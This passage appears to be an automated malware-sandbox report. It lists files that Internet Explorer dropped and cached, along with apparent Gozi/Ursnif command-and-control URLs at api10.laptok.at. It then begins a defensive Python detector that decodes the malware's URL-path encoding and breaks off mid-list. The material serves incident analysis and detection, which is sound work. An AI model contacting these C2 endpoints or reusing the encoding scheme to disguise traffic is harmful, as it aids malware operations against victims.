                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):647
                                                                                                                                      Entropy (8bit):5.087026282289658
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxi0OpOX4nWimI002EtM3MHdNMNxi0OpOX4nWimI00Obd5EtMb:2d6Nxh4SZHKd6Nxh4SZ7Jjb
                                                                                                                                      MD5:E94C54A3D22944401298F92C5A9D0942
                                                                                                                                      SHA1:7F64BAAE56143B754270302263834AF185A92FBF
                                                                                                                                      SHA-256:620A689C180141218B225E5F23631CAD9435B50797B2D5CAC945AC1C4A404E29
                                                                                                                                      SHA-512:46E8F47A87D5F1275AF14672C277BE9D69870D55DC9DB5B458C324CFB9522A407A72DEA6608E1CFA8A61A8F6712A2B7916E9E0A7848CA04924AC1E9F54A9FE70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.13628902919673
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxhGw02Tp2TX4nWimI002EtM3MHdNMNxhGw02Tp2TX4nWimI00Ob8K075t:2d6NxQP4SZHKd6NxQP4SZ7YKajb
                                                                                                                                      MD5:22A263B499DB5D19998731111CA9B90D
                                                                                                                                      SHA1:9EC32CAB0B18DC969117CE0D2F0D6363566E8565
                                                                                                                                      SHA-256:819997C6EE7A94F7A998BFC8DBA2FED8AF1B99F8A28627EFC98240852AF257B8
                                                                                                                                      SHA-512:968FC394F7C031CC69242270017636DE8273084EB7F7C0E330F35854BAD2D822472F0E94C255FD9E5A168805F55599668ADAB14E4FAF1BF677AC4FBA1E33D335
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.078062345810726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNx0n0KdWpKdWX4nWimI002EtM3MHdNMNx0n0KdWpKdWX4nWimI00ObxEty:2d6Nx0rfK4SZHKd6Nx0rfK4SZ7nb
                                                                                                                                      MD5:74D54AEF719C33D18E3B3ABB0CA5BAAC
                                                                                                                                      SHA1:A94F71BE8198C097B5E82DE0F1D3FD80A58CE94E
                                                                                                                                      SHA-256:3106D23C3F43BBE6E7303878930A376216223BA71FB35F303300D38CDEC888F2
                                                                                                                                      SHA-512:DD81C7461CE3FD8C7717E12132E790C26F8D9005E0AA2FAB0A69BC17A60B3E7889C2CF38779EBAE671EA708C4B9A122F92E1B2AF75685FDFABF4CE53D5303CE8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.115180936428906
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxx0OpOX4nWimI002EtM3MHdNMNxx0OpKdWX4nWimI00Ob6Kq5EtMb:2d6NxW4SZHKd6NxoK4SZ7ob
                                                                                                                                      MD5:663C96EF5063DF9CDE299E8DA5CBDBFF
                                                                                                                                      SHA1:38F6EA7AC5756E43A0815E73D3A0D423E6927C5D
                                                                                                                                      SHA-256:278F923B5FECB5C0405D1C6CEDC3BF5F5E73D21374EC8EB9D20683334295C3AD
                                                                                                                                      SHA-512:ABB0CDEA2F4E3C831A23745B711981E56F1036E50D7292BB22DF35ACE4EAA9125593E9EBF9268297B8EEFA95BE3EB805FBF1AC3A9161824F0D657F515C66C8C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):659
                                                                                                                                      Entropy (8bit):5.1243145832336445
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxcsUxUX4nWimI002EtM3MHdNMNxcsUxUX4nWimI00ObVEtMb:2d6Nxv4SZHKd6Nxv4SZ7Db
                                                                                                                                      MD5:ED9176B3D75A7C27CB5763C41A1AE91D
                                                                                                                                      SHA1:D1EB120E09624DB29FD74251D32DA4392A1E7F5C
                                                                                                                                      SHA-256:D585B4EEF70FA5D1E181D5789B46113207663E3820ADBF83DC2ADA049AD642D0
                                                                                                                                      SHA-512:BD17014708F89A12410E90B0534A40A04719C2BC32738976BCC18EAAE2BD084177F44A8070829878BD0E7BD22A9EDC9B8625D87E2E9BE324B36C19DB8A5958AE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.072911264014693
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxfn0OpOX4nWimI002EtM3MHdNMNxfn0OpOX4nWimI00Obe5EtMb:2d6NxI4SZHKd6NxI4SZ7ijb
                                                                                                                                      MD5:0BAE92F55D07580AACAF7BB17C6423C7
                                                                                                                                      SHA1:0327680EBC8E79B6C957F3116FC9A8A33C5EC000
                                                                                                                                      SHA-256:ABB47EDD851CC71FB9D738D3B586FAE86FA4F430420874E1BD46D0B6481328DF
                                                                                                                                      SHA-512:A3F0F833843E1F5FF42019CDCBBA5870C0E52DB325DE3A7750AF2E1C36752EA7901E8B33C1BF77BEB096BB6E3CD376B1B4160557550F2F8AB93CC1A1A68610B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\c[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2400
                                                                                                                                      Entropy (8bit):5.975522616591464
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:T2ECG/vT+XLMHbLRCI24UCknBdpK2jgPOKipWUlgrjDu5pODzMHxW:KECGT+XqLxwnBbK8WUlqqaHMHxW
                                                                                                                                      MD5:E69A66BA1BFF6972458D1BC41252EE98
                                                                                                                                      SHA1:262423E195EE52FE55A2FA3CCD97E9B6619117A5
                                                                                                                                      SHA-256:F1D70F929CDCB80F5CD8AAE9F8A41AB63FA171F224206A020596F73E88E384B2
                                                                                                                                      SHA-512:5EBDB4B48518CD539BE0ED3CC3EE25996D14A8E473DD0F0261439BF04F416902E6ACDA45E00DEF009CAD129EBC4EAD09A791357AACC3B829C4973080783BEEA7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):4720
                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2168
                                                                                                                                      Entropy (8bit):5.207912016937144
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                      MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                      SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                      SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                      SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                      Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.304718288205936
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                      MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                      SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                      SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                      SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\xxdXe7[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):338016
                                                                                                                                      Entropy (8bit):5.999979867333796
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:h7OGXHIEr+zisK8tb3/VKph5ur8FlLivxSZXKoWEPws/2ImLLW4Ytb31Zmqq:N1iis338p6r8lLi5ScrUwwjsC4YtbFYV
                                                                                                                                      MD5:AB868B345CA418AA4FACC6D46BD38178
                                                                                                                                      SHA1:A0A4189DC35EF39534A2EE41980275348B7AA8EE
                                                                                                                                      SHA-256:DAA9372E5A21C9079A646855110C83154D77B5E6DF2F37E949EA8452ABC1EF27
                                                                                                                                      SHA-512:1AE9D9E1D1C2BB3972433EBCE0DB8CAEEDA67AA93D1C8F09452593D67E59936446486B47B0C0775DF26F484479EB79818FC1D05526C6556B132FACB08A2A9D9C
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7
                                                                                                                                       Preview:
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):453
                                                                                                                                      Entropy (8bit):5.019973044227213
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                      MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                      SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                      SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                      SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                      Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):12105
                                                                                                                                      Entropy (8bit):5.451485481468043
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                      MD5:9234071287E637F85D721463C488704C
                                                                                                                                      SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                      Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\7[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):267700
                                                                                                                                      Entropy (8bit):5.999877808101812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:0GtBeRO1EXAR18gvZYQhlTIorpKkFqBCf:/tgROGm1qEl9rpKhi
                                                                                                                                      MD5:BF32F421FA2847FAA8DB0BE9201BA6DE
                                                                                                                                      SHA1:FD7A60D7431272DD5906940F08933E9A86A4283B
                                                                                                                                      SHA-256:FCA7FA4DFFAD605B97E30A75F5847E54E1B16D89B13C2542ACA5B1208F400F9A
                                                                                                                                      SHA-512:56E1D7C7AFF4A81EAF3209EA2F1812960260D8BDBC0DC3B3501D78C48FC978D8C431714063D98D1EEF2D88F47B32E45BD9F59596DCE4FC82DB54CFA382D32649
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7
                                                                                                                                       Preview:
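The two api10.laptok.at requests cached above (xxdXe7[1].htm and 7[1].htm) carry their data in the URL path, which is the well-known Gozi/Ursnif transport encoding: the request is encrypted, base64-encoded, percent-escaped with `_` in place of `%` (`_2F` for `/`, `_2B` for `+`, `_0A`/`_0D` for the line breaks the base64 encoder inserts) and then cut into pseudo-directories at arbitrary offsets, so an escape can straddle a `/` (`IZ6B_/2B8hrjTH` in the first URL, `AtiU_2/FKiPw` in the second). The Python below is an added example, not part of this report or of any sandbox tooling: it recognises that scheme in a list of proxy-log URLs and undoes the transport encoding. It assumes the leading `api1` directory is a fixed prefix and drops it; the CDN-style negative URL is constructed; `res://ieframe.dll/bullet.png` is the resource URL from this report. What comes back after base64 decoding is still ciphertext, since the report contains no key.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# The two C2 requests cached by iexplore.exe in this report (copied from the
# "IE Cache URL" fields above).
OBSERVED_URLS: List[str] = [
    "http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7",
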